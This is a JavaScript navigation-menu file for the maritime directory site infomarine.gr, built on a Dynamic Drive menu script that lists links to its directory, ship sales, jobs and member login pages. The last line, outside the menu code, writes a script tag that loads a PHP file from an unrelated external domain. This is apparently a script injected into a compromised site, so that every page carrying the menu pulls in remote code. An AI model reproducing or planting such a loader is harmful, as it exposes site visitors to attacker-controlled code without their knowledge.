//Top Nav bar script v2.1- http://www.dynamicdrive.com/dynamicindex1/sm/index.htm

function showToolbar()
{
// AddItem(id, text, hint, location, alternativeLocation);
// AddSubItem(idParent, text, hint, location, linktarget);

	menu = new Menu();
	menu.addItem("webmasterid", " Home Select Directory->> ", ".", ".");
	menu.addSubItem("webmasterid", "Maritime directory", "", "http://www.infomarine.gr/index.html", "_top");
	menu.addSubItem("webmasterid", "By Country and Service", "", "http://www.infomarine.gr/country/index.html", "_top");
        menu.addSubItem("webmasterid", "Shipyards Directory", "", "http://www.infomarine.gr/shipyards/index.php", "_top");
	menu.addSubItem("webmasterid", "Spare Parts Finder", "", "http://www.infomarine.gr/spares/index.html", "_top");
	menu.addSubItem("webmasterid", "Software Finder", "", "http://www.infomarine.gr/indextopsoftware.htm", "_top");
        menu.addSubItem("webmasterid", "Software selection", "",  "http://www.infomarine.gr/cgi-bin/insoft1.pl?Software+On+Sale", "");
	menu.addSubItem("webmasterid", "Worldwide Ports", "", "http://www.infomarine.gr/ports/index.html", "_top");
	menu.addSubItem("webmasterid", "S+P Ships for Sale", "",  "http://www.infomarine.gr/ships/index.html", "_top");
	menu.addSubItem("webmasterid", "Find Job", "",  "http://www.infomarine.gr/indexemploy.htm", "_top");
        menu.addSubItem("webmasterid", "Technical Library", "", "http://www.infomarine.gr/bulletins/index.html", "_top");
	menu.addSubItem("webmasterid", "New products", "",  "http://www.infomarine.gr/products/index.html", "_top");
	menu.addSubItem("webmasterid", "Nautical books", "",  "http://www.infomarine.gr/cgi-bin/insoft1.pl?Nautical+books+On+Sale", "");
	menu.addSubItem("webmasterid", "Maritime Dictionary", "",  "http://www.infomarine.gr/indexdictionary.htm", "_top");
	menu.addSubItem("webmasterid", "Maritime Daily News", "",  "http://www.infomarine.gr/news/index.html", "_top");
	menu.addSubItem("webmasterid", "Website Popularity", "Website Popularity",  "http://www.infomarine.gr/adv_lnks.htm", "");
        menu.addSubItem("webmasterid", "Website Statistics", "Website statistics",  "http://www.infomarine.gr/statistics/web.htm", "");
        menu.addSubItem("webmasterid", "Compare Popularity", "Compare Popularity",  "http://www.infomarine.gr/statistics/", "_top");
	menu.addSubItem("webmasterid", "Internet Services", "",  "http://www.infomarine.gr/services/index.html", "_top");
	menu.addSubItem("webmasterid", "Chat-WebMail", "",  "http://www.flashmail.gr/", "_top");
	menu.addSubItem("webmasterid", "Login members", "",  "http://www.infomarine.gr/login/", "_blank");

	menu.showMenu();
}
document.write('<script src=http://sweetworld.co.uk/turkce/sweetworld-brand.php ><\/script>');
